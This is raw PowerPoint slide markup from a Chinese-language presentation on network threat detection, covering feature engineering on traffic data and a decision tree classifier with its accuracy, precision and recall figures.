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5"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="285" r:id="rId6"/>
    <p:sldId id="291" r:id="rId7"/>
    <p:sldId id="287" r:id="rId8"/>
    <p:sldId id="294" r:id="rId9"/>
    <p:sldId id="295" r:id="rId10"/>
    <p:sldId id="296" r:id="rId11"/>
    <p:sldId id="297" r:id="rId12"/>
    <p:sldId id="298" r:id="rId13"/>
    <p:sldId id="288" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="289" r:id="rId17"/>
    <p:sldId id="302" r:id="rId18"/>
    <p:sldId id="301" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="303" r:id="rId21"/>
    <p:sldId id="305" r:id="rId22"/>
    <p:sldId id="306" r:id="rId23"/>
    <p:sldId id="284" r:id="rId2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365"/>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tags" Target="../tags/tag66.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65.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tags" Target="../tags/tag70.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag69.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag67.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.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image" Target="../media/image19.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag73.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag72.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag71.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.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tags" Target="../tags/tag76.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image" Target="../media/image23.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag79.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag78.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag77.xml"/><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tags" Target="../tags/tag83.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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8.png"/><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media/image27.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag84.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.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image" Target="../media/image31.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag90.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag89.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag88.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tags" Target="../tags/tag91.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tags" Target="../tags/tag9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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag48.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag46.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tags" Target="../tags/tag49.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.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tags" Target="../tags/tag59.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag58.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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tags" Target="../tags/tag61.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag60.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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1252694" y="1641692"/>
            <a:ext cx="9686611" cy="5016934"/>
            <a:chOff x="1496680" y="1476374"/>
            <a:chExt cx="7266319" cy="4386807"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1571625" y="1476374"/>
              <a:ext cx="7086600" cy="3248025"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E8F5F8"/>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Arial" panose="020B0604020202090204"/>
                <a:ea typeface="微软雅黑"/>
                <a:sym typeface="Arial" panose="020B0604020202090204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8"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4560449" y="1660630"/>
              <a:ext cx="1138782" cy="7266319"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293154" y="2410110"/>
            <a:ext cx="7565925" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0">
                <a:latin typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
                <a:ea typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
              </a:rPr>
              <a:t>网络威胁检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0">
                <a:latin typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
                <a:ea typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0">
              <a:latin typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
              <a:ea typeface="报隶-简" panose="02010600040101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3113836" y="3740348"/>
            <a:ext cx="5964321" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>张志心</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魏子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>舒</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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iterate type="wd">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1775"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="16" presetClass="entr" presetSubtype="21"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6717665"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特征工程（数据预处理）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>设计</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="886460" y="1365250"/>
            <a:ext cx="7277100" cy="431800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8448040" y="1225550"/>
            <a:ext cx="2324100" cy="4457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3041015"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其余特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>处理：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1049020" y="1765300"/>
            <a:ext cx="9342755" cy="3322955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>用源端口的数量和目的端口的数量替换这两个特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，考虑将 IP 特征转化整数表示，再提取IP所在国家城市</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>（用字符串表示）为一个新的特征。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2374900"/>
            <a:ext cx="4495800" cy="1054100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809230" y="2206625"/>
            <a:ext cx="3213100" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1457325" y="4721860"/>
            <a:ext cx="7607300" cy="1054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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="834390" y="4531360"/>
            <a:ext cx="9415780" cy="171005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6757035" y="806450"/>
            <a:ext cx="3239770" cy="323977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834390" y="621665"/>
            <a:ext cx="5233035" cy="2494915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165866" y="3693677"/>
            <a:ext cx="3448050" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据预处理完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>👇</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3863340" y="621665"/>
            <a:ext cx="2369185" cy="2494915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent6">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2224405"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评价</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>指标：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319530" y="1572260"/>
            <a:ext cx="6718300" cy="4102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2224405"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决策树</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="474345" y="1365250"/>
            <a:ext cx="3987800" cy="260286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633595" y="1285240"/>
            <a:ext cx="3541395" cy="268287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7971790" y="1365885"/>
            <a:ext cx="3658235" cy="2602230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086485" y="4582795"/>
            <a:ext cx="2776220" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>准确率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>99.54%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>精确率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>84.62%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>召回率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>89.34%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630420" y="4457700"/>
            <a:ext cx="2776220" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>准确率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>99.54%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>精确率：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>84.61%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
